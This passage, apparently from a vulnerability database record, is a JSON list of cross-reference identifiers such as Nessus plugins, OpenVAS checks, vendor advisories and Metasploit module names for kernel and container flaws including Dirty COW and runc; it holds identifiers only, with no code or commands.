"GITLAB-8430650BBD839B53E88B3F57D2EB5758", "GITLAB-E1D4710E2B05EB8D583F4EBD1405CD04", "GITLAB-F1EB915BDF0E1D2E76026B2823906D1D"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:60F2E118E85CB34AAEEAED9DE88D51AF", "GOOGLEPROJECTZERO:814DAD5293CFBE484AFB6C0462210E0D"]}, {"type": "hackerone", "idList": ["H1:495495", "H1:764986", "H1:867699"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20161207-01-DIRTYCOW"]}, {"type": "ibm", "idList": ["0C931C8FB3337ADB707B8C54D7D2E65C09B2A9067AF3442FB5EDF49ED471F44A", "0D42C75A71CBB8E368EA101C28FA8E082688B84C5A96F4A64DF291144B6591AD", "0FA8F160274D65EBE3F9DF5D68DD52137C903D463F70DBAFEABAD8324EE404EC", "1914476FD091A15E96610F7BF31547167EE2615FDE4E5D3885C1359FD96241AA", "19D52A8FF35F7ED39A8E12A67475724D85072FACAB5E51B0C6DA31F67A07D139", "1A91FB8601D752BFD8B027B3D77C02E358257AF9F10E8B2DD58DEF09EE89D628", "1BEFC4BAC4942A423BAD047BDFA834A2310A9B22AF69FE30D00EBDF09FF6F754", "23CDFC767B1F8B0922BC72249E18F4BE7A23A2D5C6AAF52840D8298A30852894", "2B29E722CD7842746B86A41D74A03ECFD764A2734D5BE6FAAE9F2F3E29DF2040", "2E0D3D0CF86F6C48B680F76C93BAE1886AC182B679AAB019C0AA49D79D2D84BA", "2F7D9559AE426A44085F66D3B32DC79DBD644723F26961D9815EF3606625EE87", "39FA7810AE45CB9F7E0C88948CD306C85FD45D0E3AFC29148CB941215466B523", "3BB2DE866A11FAD4771919913C5F3DD9328DBA21AD505E9306555868A431908C", "3F638ACF3062BBAD408A6AB90AB722B2B647D1C82052603A0DF945EFCF2A52C8", "413EFD2051B06CEFCDFB6A85E56D412853059B72C27BDAC4B5D06E384C0A787D", "41CB9666A88AE67D4A0558674B8CFDA62F160B6DDCBA3C10576515447887CF12", "44289E9AFA262B32B9B340C2E5063B6A6A7C857ECC454752758C62450EDDB5A1", "4BEC8E9463E4B27C09D4E3ECF5C98A9E0D6D193C06E6EFC3DEDB9F41368D7DC0", "4CE6EF5A931E1DD71173744E63FA5B598713F2EB1EFE22E55E4D35D7659268AA", "56A78D4F1D7952AD8DD9B2D2FC4689C94FD82AA81A162A802A0DC498BB24B827", "582F96446333EB82A24A0C13191C208F7E940B6AE34B504E8FD5A296160793B6", "59A24344B16F41FDA29E13AC82F85E48C72A67AD619672DE0CAC8898427FEE09", "5ADDCDCCBCAA61DA8CF5B02CB5B449E5A5F2BFFE2D509DF07ECBF25E4F3493E4", "68A2A52B486DE856D9D7DEBE2A73EF9375AF2AD3DE794F39D2969903EBA03921", "69C147CB642B39AA3250947FC1868ED542CC9C2C3BED4BA821CAD9BA0F178E84", "6AC8F8C50686802A05555281D5D05D5AB8997C027EADF699A3A6C4352B28516B", "72E7AF4810645A74EE755605BEE8DE4EB2B74F3B710D63463C7B5B8748A244E4", "764590A4B9E47D7E86F4E1AD3CAA72AF8E48B738F1667323140B928C6A564E13", "7975EECD3D2EE6CE08E72863DB53AD391D308F9DFA1EAA45FE674BAB1B264C0A", "799BECAD14ACCE547F7BB15B43498ACD10785511E3E4FFBF4EDAB4AA492D3628", "7A8DF41BD76EC438451409A025AAD65BC78A02087B1DD7CD7F2F435E28BE86C0", "7B359356CD081C300B6ED54BB2BAD9F9EC8844DB36B849EAB8AF90AC4CDD5E55", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7EFA8759BCB67152DFF685CC5F49F4CC4107BCB1CB0D5A99E4341CAC1F608251", "7F8E6554F6DA398AA724606DE234AF7EF09A532D4299A3D1BE71DF4204B3FCF6", "8507B058C81047318472EE4CA22600AD2B6A70184CB90B2496F848C8119E7F48", "870BEA847DD424799963E5867DAF74D2ED3D95FA2CBB891A7AF0D330D30A7BBC", "8AF1677DB6AB1C41F2040E3F3B3038E6EE675E03B6C52C33D9CCD561400B711E", "8CF75CE76A214C8E66E3A8881ED4D041C386151E2AD24B89D0E7F34885082D9F", "8EFB8A654D3536DD4481500A7680D75E0B2A04D2F63C829CAE130B12A35D7ED3", "906C8CD7D37A767D6592B0FFD75F9768235BA8C20B9D64F4DD33C15A7BB7CFC1", "938B27E41A5FB45C2E428DDD55ACB1346901CC6F33F5B67B4257EF415A10F64E", "9637EBA6484BD28F500A4FB042427C33540202FCFEE1C248C5FC5C788BB997D1", "97843D709F3A1D21B079AF090609D06C8232BD6B0AF9C686DC60FF6355F3EF04", "9ADF75B47365B276A546C6258E198C5D4136BB408380D7D9D5885BD656029DB5", "9AE75CB1A1D3DD100D9064B9CD05456A761753026F2FA396034E23E18AE154DF", "9D763AD60BE480E57427EAA71CE9F1206750FEC3D94BAB5A2A0DC8CA510EFACC", "9E37850C8244F335F0CA17B7B306304B03B94EAC82EA065D18650FE6EFCB356C", "9EF402A843CFBDB359E8B74AAD869683BC0B3E2869ACDA8CA89782199936D069", "A74B562A201F87B6DD98C72FFCBAB42E5DCAEC6CE62FE82E7BC4B489D6AF2349", "AA14C55AF4A5BFC3A22C9FAA8B34E0E1647B4C350DBEC1C6DC6BB8AF16DDF7F3", "AB2CF025F88364491DAD8A893B4FFE876A0EA1219780AEE35EB01D3E77543556", "AC5DE01326AFA37CBA7F799502684F57AF3D9271EC49734648DB7797522AF2E8", "B3F4AA1A1992E6D3190AE7943B4F2C3504BE89943C73FA50CD108D6F916DEA0B", "B486596DD1E7364DF8F8F32580A8626F3D3C61C2CAC33857048A2EB16C38DF67", "C1504E0331CDD1C6C93994699BA298E6DF006D6E0CC8A8E4231997AD972A13FD", "C2C6C7F101E8DF80A7C41D3B860D83FF7FBDA9849EE7408F7B000742FC3F3077", "C2FBE434FDED9DC756BE855E33C9AD8C0A5B759539A8AEC3235DE5AFDA3E29EF", "D123779355BC4ABF556BE1CB1C0AC3B3376DE0C5AEACD6468D7153F832BCE791", "E44CE2F0F86B1196280412E970030BEB796B7DF73A4580865992E9A728429474", "E4F312AB288C29F25E2C65D2339174FE8C9D60918D7A512EC1EA202EDC637B6D", "E5236E91681D8FBF63527B2F5A703EFE433AABE71FC32A8CA3F3B468E9DFBA61", "E82785235072F5EF5FCC205CE14F01F22FB4483D23ECF18B1C4AED471927B7FC", "E9A8C23824FEB3CF54C07A25B19E265D1905F763E9CC29B4410E2EC85F28EE49", "EDBCE2D5797575D019533793BC0DBD438D1B65A6557C755729CCDB2B49BEFFB5", "F16FD84C4B2F4D34ED0A961E38B09E4BFCE8DADD88227D9261A9F8829EFFFA29", "F9ED99C3F4B2D868A3826BA34135EFCC7EF1978329C535488F23E6CF98DA913D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB"]}, {"type": "kaspersky", "idList": ["KLA11513", "KLA11534", "KLA11821"]}, {"type": "kitploit", "idList": ["KITPLOIT:1751489026679880812", "KITPLOIT:216801248370103608", "KITPLOIT:2822940433245346068", "KITPLOIT:4462385753504235463", "KITPLOIT:4830265851778950745", "KITPLOIT:8250648883616491970"]}, {"type": "mageia", "idList": ["MGAA-2016-0134", "MGASA-2016-0347", "MGASA-2016-0364", "MGASA-2019-0068", "MGASA-2019-0087", "MGASA-2019-0251", "MGASA-2020-0372", "MGASA-2020-0392", "MGASA-2020-0468"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1A0558E103585383F84E3D6A1AD1518E"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-LOCAL-DOCKER_RUNC_ESCAPE-", "MSF:EXPLOIT-LINUX-LOCAL-NESTED_NAMESPACE_IDMAP_LIMIT_PRIV_ESC-"]}, {"type": "mscve", "idList": ["MS:CVE-2018-15664", "MS:CVE-2019-9512", "MS:CVE-2019-9514"]}, {"type": "myhack58", "idList": ["MYHACK58:62201680403", "MYHACK58:62201892318", "MYHACK58:62201994377", "MYHACK58:62201995518"]}, {"type": "nessus", "idList": ["AL2_ALAS-2018-956.NASL", "AL2_ALAS-2019-1272.NASL", "AL2_ALAS-2020-1488.NASL", "AL2_ALASKERNEL-5_4-2022-015.NASL", "ALA_ALAS-2016-757.NASL", "ALA_ALAS-2017-937.NASL", "ALA_ALAS-2018-956.NASL", "ALA_ALAS-2019-1156.NASL", "ALA_ALAS-2019-1245.NASL", "ALA_ALAS-2019-1270.NASL", "ALA_ALAS-2019-1316.NASL", "ALA_ALAS-2020-1430.NASL", "ALA_ALAS-2020-1446.NASL", "ALA_ALAS-2020-1455.NASL", "ARISTA_CVP_SA0043.NASL", "ARISTA_EOS_SA0043.NASL", "CENTOS8_RHSA-2019-0975.NASL", "CENTOS8_RHSA-2019-2925.NASL", "CENTOS8_RHSA-2019-4269.NASL", "CENTOS8_RHSA-2019-4273.NASL", "CENTOS8_RHSA-2020-4286.NASL", "CENTOS_DOCKER_CVE-2019-5736.NASL", "CENTOS_RHSA-2016-2098.NASL", "CENTOS_RHSA-2016-2105.NASL", "CENTOS_RHSA-2016-2124.NASL", "DEBIAN_DLA-2385.NASL", "DEBIAN_DLA-2420.NASL", "DEBIAN_DLA-2485.NASL", "DEBIAN_DLA-670.NASL", "DEBIAN_DSA-3696.NASL", "DEBIAN_DSA-4503.NASL", "DEBIAN_DSA-4508.NASL", "DEBIAN_DSA-4520.NASL", "DEBIAN_DSA-4521.NASL", "DEBIAN_DSA-4669.NASL", "DEBIAN_DSA-4865.NASL", "EULEROS_SA-2016-1051.NASL", "EULEROS_SA-2019-1061.NASL", "EULEROS_SA-2019-1074.NASL", "EULEROS_SA-2019-1494.NASL", "EULEROS_SA-2019-1529.NASL", "EULEROS_SA-2019-1967.NASL", "EULEROS_SA-2019-2078.NASL", "EULEROS_SA-2020-2166.NASL", "EULEROS_SA-2020-2176.NASL", "EULEROS_SA-2020-2311.NASL", "EULEROS_SA-2020-2353.NASL", "EULEROS_SA-2020-2549.NASL", "EULEROS_SA-2021-1039.NASL", "EULEROS_SA-2021-1073.NASL", "EULEROS_SA-2021-1079.NASL", "EULEROS_SA-2021-1245.NASL", "EULEROS_SA-2021-1264.NASL", "EULEROS_SA-2021-1604.NASL", "EULEROS_SA-2021-1642.NASL", "EULEROS_SA-2021-2140.NASL", "EULEROS_SA-2022-1886.NASL", "F5_BIGIP_SOL01988340.NASL", "F5_BIGIP_SOL10558632.NASL", "F5_BIGIP_SOL98053339.NASL", "FEDORA_2016-C3558808CD.NASL", "FEDORA_2016-C8A0C7EECE.NASL", "FEDORA_2016-DB4B75B352.NASL", "FEDORA_2018-16C8FDF9B8.NASL", "FEDORA_2018-2BFBD27A0B.NASL", "FEDORA_2018-314913636B.NASL", "FEDORA_2018-9B965C4EED.NASL", "FEDORA_2019-2BAA1F7B19.NASL", "FEDORA_2019-352D4B9CD8.NASL", "FEDORA_2019-3ECFF65275.NASL", "FEDORA_2019-3F19F13ECD.NASL", "FEDORA_2019-4DC1E39B34.NASL", "FEDORA_2019-55D101A740.NASL", "FEDORA_2019-5A6A7BC12C.NASL", "FEDORA_2019-6174B47003.NASL", "FEDORA_2019-65DB7AD6C7.NASL", "FEDORA_2019-6A2980DE56.NASL", "FEDORA_2019-829524F28F.NASL", "FEDORA_2019-963EA958F9.NASL", "FEDORA_2019-A5F616808E.NASL", "FEDORA_2019-BC70B381AD.NASL", "FEDORA_2019-C1DAC1B3B8.NASL", "FEDORA_2019-DF2E68AA6B.NASL", "FEDORA_2019-F455EF79B8.NASL", "FEDORA_2019-FD9345F44A.NASL", "FEDORA_2020-15A1BDE727.NASL", "FEDORA_2020-1AF9CD8C87.NASL", "FEDORA_2020-2F5879AEB6.NASL", "FEDORA_2020-61FCF3FFC7.NASL", "FEDORA_2020-7A0B6071A4.NASL", "FEDORA_2020-B858B48B23.NASL", "FEDORA_2020-BAEB8DBAEA.NASL", "FEDORA_2020-C33083813D.NASL", "FREEBSD_PKG_41F4BAACBF7711E98D2F5404A68AD561.NASL", "FREEBSD_PKG_72A5579EC76511E980520028F8D09152.NASL", "FREEBSD_PKG_73B1E734C74E11E980520028F8D09152.NASL", "FREEBSD_PKG_9FBAEFB3837E11EAB5B4641C67A117D8.NASL", "FREEBSD_PKG_C97A940BC39211E9BB38000D3AB229D6.NASL", "GENTOO_GLSA-202003-21.NASL", "GENTOO_GLSA-202105-33.NASL", "JBOSS_EAP_RHSA-2019-4021.NASL", "JUNIPER_JSA11167.NASL", "KUBERNETES_1_15_3.NASL", "KUBERNETES_1_9_4_MULTIPLE_VULNERABILITIES.NASL", "KUBE_1_12_3.NASL", "KUBE_CVE_2018_1002105.NASL", "NEWSTART_CGSL_NS-SA-2020-0082_DOCKER-CE.NASL", "NEWSTART_CGSL_NS-SA-2021-0006_CONTAINERD_IO.NASL", "NEWSTART_CGSL_NS-SA-2021-0078_KERNEL.NASL", "NEWSTART_CGSL_NS-SA-2021-0138_DOCKER-CE.NASL", "NEWSTART_CGSL_NS-SA-2022-0017_KERNEL.NASL", "OPENSUSE-2016-1211.NASL", "OPENSUSE-2016-1212.NASL", "OPENSUSE-2016-1227.NASL", "OPENSUSE-2019-1079.NASL", "OPENSUSE-2019-1275.NASL", "OPENSUSE-2019-1444.NASL", "OPENSUSE-2019-1481.NASL", "OPENSUSE-2019-1499.NASL", "OPENSUSE-2019-1621.NASL", "OPENSUSE-2019-2000.NASL", "OPENSUSE-2019-201.NASL", "OPENSUSE-2019-2021.NASL", "OPENSUSE-2019-2044.NASL", "OPENSUSE-2019-2056.NASL", "OPENSUSE-2019-2072.NASL", "OPENSUSE-2019-208.NASL", "OPENSUSE-2019-2085.NASL", "OPENSUSE-2019-2114.NASL", "OPENSUSE-2019-2115.NASL", "OPENSUSE-2019-2130.NASL", "OPENSUSE-2019-2245.NASL", "OPENSUSE-2019-252.NASL", "OPENSUSE-2019-295.NASL", "OPENSUSE-2020-1379.NASL", "OPENSUSE-2020-1382.NASL", "OPENSUSE-2020-1655.NASL", "OPENSUSE-2020-554.NASL", "OPENSUSE-2021-242.NASL", "OPENSUSE-2021-278.NASL", "ORACLELINUX_ELSA-2016-2098.NASL", "ORACLELINUX_ELSA-2016-2105.NASL", "ORACLELINUX_ELSA-2016-2124.NASL", "ORACLELINUX_ELSA-2016-3632.NASL", "ORACLELINUX_ELSA-2016-3633.NASL", "ORACLELINUX_ELSA-2016-3634.NASL", "ORACLELINUX_ELSA-2018-4061.NASL", "ORACLELINUX_ELSA-2019-0975.NASL", "ORACLELINUX_ELSA-2019-2726.NASL", "ORACLELINUX_ELSA-2019-2925.NASL", "ORACLELINUX_ELSA-2019-4269.NASL", "ORACLELINUX_ELSA-2019-4273.NASL", "ORACLELINUX_ELSA-2019-4680.NASL", "ORACLELINUX_ELSA-2020-4286.NASL", "ORACLELINUX_ELSA-2020-5739.NASL", "ORACLELINUX_ELSA-2020-5884.NASL", "ORACLELINUX_ELSA-2020-5885.NASL", "ORACLELINUX_ELSA-2020-5964.NASL", "ORACLELINUX_ELSA-2020-5966.NASL", "ORACLELINUX_ELSA-2021-9028.NASL", "ORACLELINUX_ELSA-2021-9029.NASL", "ORACLELINUX_ELSA-2021-9203.NASL", "ORACLEVM_OVMSA-2016-0149.NASL", "ORACLEVM_OVMSA-2016-0150.NASL", "ORACLEVM_OVMSA-2016-0158.NASL", "ORACLEVM_OVMSA-2017-0057.NASL", "PHOTONOS_PHSA-2018-2_0-0112.NASL", "PHOTONOS_PHSA-2018-2_0-0112_KUBERNETES.NASL", "PHOTONOS_PHSA-2019-1_0-0202_KUBERNETES.NASL", "PHOTONOS_PHSA-2019-1_0-0238_DOCKER.NASL", "PHOTONOS_PHSA-2019-2_0-0162_DOCKER.NASL", "PHOTONOS_PHSA-2019-2_0-0193_DOCKER.NASL", "PHOTONOS_PHSA-2019-3_0-0019_DOCKER.NASL", "PHOTONOS_PHSA-2020-1_0-0264_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-1_0-0292_DOCKER.NASL", "PHOTONOS_PHSA-2020-1_0-0323_LINUX.NASL", "PHOTONOS_PHSA-2020-2_0-0235_DOCKER.NASL", "PHOTONOS_PHSA-2020-2_0-0270_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-2_0-0282_LINUX.NASL", "PHOTONOS_PHSA-2020-2_0-0285_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-2_0-0301_CONTAINERD.NASL", "PHOTONOS_PHSA-2020-3_0-0085_DOCKER.NASL", "PHOTONOS_PHSA-2020-3_0-0123_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-3_0-0140_LINUX.NASL", "PHOTONOS_PHSA-2020-3_0-0142_KUBERNETES.NASL", "PHOTONOS_PHSA-2020-3_0-0168_CONTAINERD.NASL", "PHOTONOS_PHSA-2021-4_0-0007_CONTAINERD.NASL", "RANCHEROS_1_5_1.NASL", "RANCHER_2_1_3.NASL", "REDHAT-RHSA-2016-2098.NASL", "REDHAT-RHSA-2016-2105.NASL", "REDHAT-RHSA-2016-2106.NASL", "REDHAT-RHSA-2016-2107.NASL", "REDHAT-RHSA-2016-2110.NASL", "REDHAT-RHSA-2016-2118.NASL", "REDHAT-RHSA-2016-2120.NASL", "REDHAT-RHSA-2016-2124.NASL", "REDHAT-RHSA-2016-2126.NASL", "REDHAT-RHSA-2016-2127.NASL", "REDHAT-RHSA-2016-2128.NASL", "REDHAT-RHSA-2016-2132.NASL", "REDHAT-RHSA-2016-2133.NASL", "REDHAT-RHSA-2018-0475.NASL", "REDHAT-RHSA-2018-2906.NASL", "REDHAT-RHSA-2018-2908.NASL", "REDHAT-RHSA-2018-3537.NASL", "REDHAT-RHSA-2018-3549.NASL", "REDHAT-RHSA-2018-3551.NASL", "REDHAT-RHSA-2018-3598.NASL", "REDHAT-RHSA-2018-3624.NASL", "REDHAT-RHSA-2018-3742.NASL", "REDHAT-RHSA-2018-3752.NASL", "REDHAT-RHSA-2018-3754.NASL", "REDHAT-RHSA-2019-0303.NASL", "REDHAT-RHSA-2019-0304.NASL", "REDHAT-RHSA-2019-0408.NASL", "REDHAT-RHSA-2019-0975.NASL", "REDHAT-RHSA-2019-1910.NASL", "REDHAT-RHSA-2019-2661.NASL", "REDHAT-RHSA-2019-2682.NASL", "REDHAT-RHSA-2019-2690.NASL", "REDHAT-RHSA-2019-2726.NASL", "REDHAT-RHSA-2019-2769.NASL", "REDHAT-RHSA-2019-2817.NASL", "REDHAT-RHSA-2019-2925.NASL", "REDHAT-RHSA-2019-3131.NASL", "REDHAT-RHSA-2019-3132.NASL", "REDHAT-RHSA-2019-3239.NASL", "REDHAT-RHSA-2019-3245.NASL", "REDHAT-RHSA-2019-3265.NASL", "REDHAT-RHSA-2019-3811.NASL", "REDHAT-RHSA-2019-3905.NASL", "REDHAT-RHSA-2019-3906.NASL", "REDHAT-RHSA-2019-4018.NASL", "REDHAT-RHSA-2019-4019.NASL", "REDHAT-RHSA-2019-4020.NASL", "REDHAT-RHSA-2019-4040.NASL", "REDHAT-RHSA-2019-4041.NASL", "REDHAT-RHSA-2019-4042.NASL", "REDHAT-RHSA-2019-4269.NASL", "REDHAT-RHSA-2019-4273.NASL", "REDHAT-RHSA-2020-0406.NASL", "REDHAT-RHSA-2020-2413.NASL", "REDHAT-RHSA-2020-2653.NASL", "REDHAT-RHSA-2020-2795.NASL", "REDHAT-RHSA-2020-2796.NASL", "REDHAT-RHSA-2020-2799.NASL", "REDHAT-RHSA-2020-2861.NASL", "REDHAT-RHSA-2020-2863.NASL", "REDHAT-RHSA-2020-2870.NASL", "REDHAT-RHSA-2020-2927.NASL", "REDHAT-RHSA-2020-2992.NASL", "REDHAT-RHSA-2020-3519.NASL", "REDHAT-RHSA-2020-3579.NASL", "REDHAT-RHSA-2020-3808.NASL", "REDHAT-RHSA-2020-4286.NASL", "REDHAT-RHSA-2020-4287.NASL", "REDHAT-RHSA-2020-4289.NASL", "REDHAT-RHSA-2020-5199.NASL", "REDHAT-RHSA-2021-0079.NASL", "REDHAT-RHSA-2021-3915.NASL", "SLACKWARE_SSA_2016-305-01.NASL", "SL_20161024_KERNEL_ON_SL7_X.NASL", "SL_20161025_IMPORTANT__KERNEL_ON_SL6_X.NASL", "SL_20161028_KERNEL_ON_SL5_X.NASL", "SMB_NT_MS19_AUG_4511553.NASL", "SMB_NT_MS19_AUG_4512497.NASL", "SMB_NT_MS19_AUG_4512501.NASL", "SMB_NT_MS19_AUG_4512507.NASL", "SMB_NT_MS19_AUG_4512508.NASL", "SMB_NT_MS19_AUG_4512516.NASL", "SMB_NT_MS19_AUG_4512517.NASL", "SUSE_SU-2016-2585-1.NASL", "SUSE_SU-2016-2592-1.NASL", "SUSE_SU-2016-2593-1.NASL", "SUSE_SU-2016-2596-1.NASL", "SUSE_SU-2016-2614-1.NASL", "SUSE_SU-2016-2632-1.NASL", "SUSE_SU-2016-2633-1.NASL", "SUSE_SU-2016-2636-1.NASL", "SUSE_SU-2016-2655-1.NASL", "SUSE_SU-2016-2657-1.NASL", "SUSE_SU-2016-2658-1.NASL", "SUSE_SU-2016-2659-1.NASL", "SUSE_SU-2019-0362-1.NASL", "SUSE_SU-2019-0495-1.NASL", "SUSE_SU-2019-1234-2.NASL", "SUSE_SU-2019-1562-1.NASL", "SUSE_SU-2019-2117-1.NASL", "SUSE_SU-2019-2213-1.NASL", "SUSE_SU-2019-2214-1.NASL", "SUSE_SU-2019-2223-1.NASL", "SUSE_SU-2019-2254-1.NASL", "SUSE_SU-2019-2259-1.NASL", "SUSE_SU-2019-2260-1.NASL", "SUSE_SU-2020-0059-1.NASL", "SUSE_SU-2020-2574-1.NASL", "SUSE_SU-2020-2575-1.NASL", "SUSE_SU-2020-2576-1.NASL", "SUSE_SU-2020-2577-1.NASL", "SUSE_SU-2020-2578-1.NASL", "SUSE_SU-2020-2582-1.NASL", "SUSE_SU-2020-2610-1.NASL", "SUSE_SU-2020-2623-1.NASL", "SUSE_SU-2020-3014-1.NASL", "SUSE_SU-2020-3225-1.NASL", "SUSE_SU-2021-0435-1.NASL", "UBUNTU_USN-3104-1.NASL", "UBUNTU_USN-3105-1.NASL", "UBUNTU_USN-3105-2.NASL", "UBUNTU_USN-3106-1.NASL", "UBUNTU_USN-3106-2.NASL", "UBUNTU_USN-3106-3.NASL", "UBUNTU_USN-3106-4.NASL", "UBUNTU_USN-3107-1.NASL", "UBUNTU_USN-3107-2.NASL", "UBUNTU_USN-3832-1.NASL", "UBUNTU_USN-3833-1.NASL", "UBUNTU_USN-3835-1.NASL", "UBUNTU_USN-3836-1.NASL", "UBUNTU_USN-3836-2.NASL", "UBUNTU_USN-4048-1.NASL", "UBUNTU_USN-4308-1.NASL", "UBUNTU_USN-4489-1.NASL", "UBUNTU_USN-4653-1.NASL", "UBUNTU_USN-4653-2.NASL", "VIRTUOZZO_VZA-2017-109.NASL", "VIRTUOZZO_VZA-2017-110.NASL", "VIRTUOZZO_VZA-2017-111.NASL", "VIRTUOZZO_VZA-2018-004.NASL", "VIRTUOZZO_VZA-2019-008.NASL", "WEB_APPLICATION_SCANNING_113005"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106510", "OPENVAS:1361412562310108768", "OPENVAS:1361412562310120746", "OPENVAS:1361412562310140175", "OPENVAS:1361412562310141997", "OPENVAS:1361412562310142683", "OPENVAS:1361412562310142793", "OPENVAS:1361412562310143069", "OPENVAS:1361412562310703696", "OPENVAS:1361412562310704390", "OPENVAS:1361412562310704503", "OPENVAS:1361412562310704508", "OPENVAS:1361412562310704520", "OPENVAS:1361412562310704521", "OPENVAS:1361412562310704669", "OPENVAS:1361412562310809932", "OPENVAS:1361412562310809956", "OPENVAS:1361412562310815431", "OPENVAS:1361412562310815432", "OPENVAS:1361412562310815433", "OPENVAS:1361412562310815434", "OPENVAS:1361412562310815435", "OPENVAS:1361412562310815436", "OPENVAS:1361412562310815437", "OPENVAS:1361412562310842919", "OPENVAS:1361412562310842920", "OPENVAS:1361412562310842921", "OPENVAS:1361412562310842922", "OPENVAS:1361412562310842923", "OPENVAS:1361412562310842924", "OPENVAS:1361412562310842925", "OPENVAS:1361412562310842926", "OPENVAS:1361412562310842974", "OPENVAS:1361412562310842975", "OPENVAS:1361412562310843839", "OPENVAS:1361412562310843840", "OPENVAS:1361412562310843841", "OPENVAS:1361412562310843842", "OPENVAS:1361412562310843843", "OPENVAS:1361412562310844086", "OPENVAS:1361412562310844371", "OPENVAS:1361412562310851414", "OPENVAS:1361412562310851415", "OPENVAS:1361412562310851420", "OPENVAS:1361412562310852299", "OPENVAS:1361412562310852308", "OPENVAS:1361412562310852319", "OPENVAS:1361412562310852335", "OPENVAS:1361412562310852379", "OPENVAS:1361412562310852450", "OPENVAS:1361412562310852527", "OPENVAS:1361412562310852536", "OPENVAS:1361412562310852585", "OPENVAS:1361412562310852679", "OPENVAS:1361412562310852683", "OPENVAS:1361412562310852691", "OPENVAS:1361412562310852697", "OPENVAS:1361412562310852699", "OPENVAS:1361412562310852813", "OPENVAS:1361412562310852819", "OPENVAS:1361412562310852826", "OPENVAS:1361412562310852847", "OPENVAS:1361412562310852848", "OPENVAS:1361412562310852903", "OPENVAS:1361412562310853127", "OPENVAS:1361412562310871675", "OPENVAS:1361412562310871676", "OPENVAS:1361412562310871677", "OPENVAS:1361412562310871972", "OPENVAS:1361412562310874425", "OPENVAS:1361412562310874578", "OPENVAS:1361412562310875467", "OPENVAS:1361412562310875472", "OPENVAS:1361412562310875473", "OPENVAS:1361412562310875482", "OPENVAS:1361412562310875618", "OPENVAS:1361412562310875688", "OPENVAS:1361412562310875706", "OPENVAS:1361412562310875806", "OPENVAS:1361412562310875930", "OPENVAS:1361412562310875978", "OPENVAS:1361412562310876139", "OPENVAS:1361412562310876244", "OPENVAS:1361412562310876279", "OPENVAS:1361412562310876715", "OPENVAS:1361412562310876717", "OPENVAS:1361412562310876722", "OPENVAS:1361412562310876757", "OPENVAS:1361412562310876760", "OPENVAS:1361412562310876761", "OPENVAS:1361412562310876762", "OPENVAS:1361412562310876766", "OPENVAS:1361412562310876767", "OPENVAS:1361412562310876768", "OPENVAS:1361412562310876772", "OPENVAS:1361412562310876892", "OPENVAS:1361412562310876912", "OPENVAS:1361412562310876991", "OPENVAS:1361412562310877499", "OPENVAS:1361412562310882583", "OPENVAS:1361412562310882584", "OPENVAS:1361412562310882585", "OPENVAS:1361412562311220161051", "OPENVAS:1361412562311220191061", "OPENVAS:1361412562311220191074", "OPENVAS:1361412562311220191494", "OPENVAS:1361412562311220191529", "OPENVAS:1361412562311220191967", "OPENVAS:1361412562311220192078", "OPENVAS:703696"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247", "ORACLE:CPUJUL2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2098", "ELSA-2016-2105", "ELSA-2016-2124", "ELSA-2016-2124-1", "ELSA-2016-2574", "ELSA-2016-2766", "ELSA-2016-3632", "ELSA-2016-3633", "ELSA-2016-3634", "ELSA-2018-4061", "ELSA-2018-4303", "ELSA-2019-0975", "ELSA-2019-2726", "ELSA-2019-2925", "ELSA-2019-4269", "ELSA-2019-4273", "ELSA-2019-4540", "ELSA-2019-4546", "ELSA-2019-4550", "ELSA-2019-4551", "ELSA-2019-4680", "ELSA-2019-4756", "ELSA-2019-4813", "ELSA-2019-4816", "ELSA-2019-4827", "ELSA-2020-0348", "ELSA-2020-1379", "ELSA-2020-1926", "ELSA-2020-3053", "ELSA-2020-4286", "ELSA-2020-4431", "ELSA-2020-5654", "ELSA-2020-5728", "ELSA-2020-5739", "ELSA-2020-5765", "ELSA-2020-5766", "ELSA-2020-5767", "ELSA-2020-5823", "ELSA-2020-5884", "ELSA-2020-5885", "ELSA-2020-5900", "ELSA-2020-5964", "ELSA-2020-5966", "ELSA-2021-0705", "ELSA-2021-9028", "ELSA-2021-9029", "ELSA-2021-9203"]}, {"type": "osv", "idList": ["OSV:DLA-2385-1", "OSV:DLA-2420-1", "OSV:DLA-2485-1", "OSV:DLA-670-1", "OSV:DSA-3696-1", "OSV:DSA-4503-1", "OSV:DSA-4508-1", "OSV:DSA-4520-1", "OSV:DSA-4521-1", "OSV:DSA-4669-1", "OSV:DSA-4865-1", "OSV:GHSA-32GV-6CF3-WCMQ", "OSV:GHSA-36XW-FX78-C5R4", "OSV:GHSA-579H-MV94-G4GP", "OSV:GHSA-6978-VG2J-CC9Q", "OSV:GHSA-877X-32PM-P28X", "OSV:GHSA-J9WF-VVM6-4R9W", "OSV:GHSA-PMQP-H87C-MR78", "OSV:GHSA-WQV3-8CM6-H6WG"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139922", "PACKETSTORM:139923", "PACKETSTORM:150489", "PACKETSTORM:163339"]}, {"type": "paloalto", "idList": ["PAN-SA-2017-0003"]}, {"type": "pentestit", "idList": ["PENTESTIT:17F601961ADDD644F762D2266795C05F"]}, {"type": "photon", "idList": ["PHSA-2018-2.0-0112", "PHSA-2019-0001", "PHSA-2019-0003", "PHSA-2019-0019", "PHSA-2019-0031", "PHSA-2019-0128", "PHSA-2019-0161", "PHSA-2019-0162", "PHSA-2019-0184", "PHSA-2019-0193", "PHSA-2019-0202", "PHSA-2019-0208", "PHSA-2019-0212", "PHSA-2019-0239", "PHSA-2019-1.0-0202", "PHSA-2019-1.0-0208", "PHSA-2019-1.0-0238", "PHSA-2019-2.0-0128", "PHSA-2019-2.0-0129", "PHSA-2019-2.0-0161", "PHSA-2019-2.0-0162", "PHSA-2019-2.0-0193", 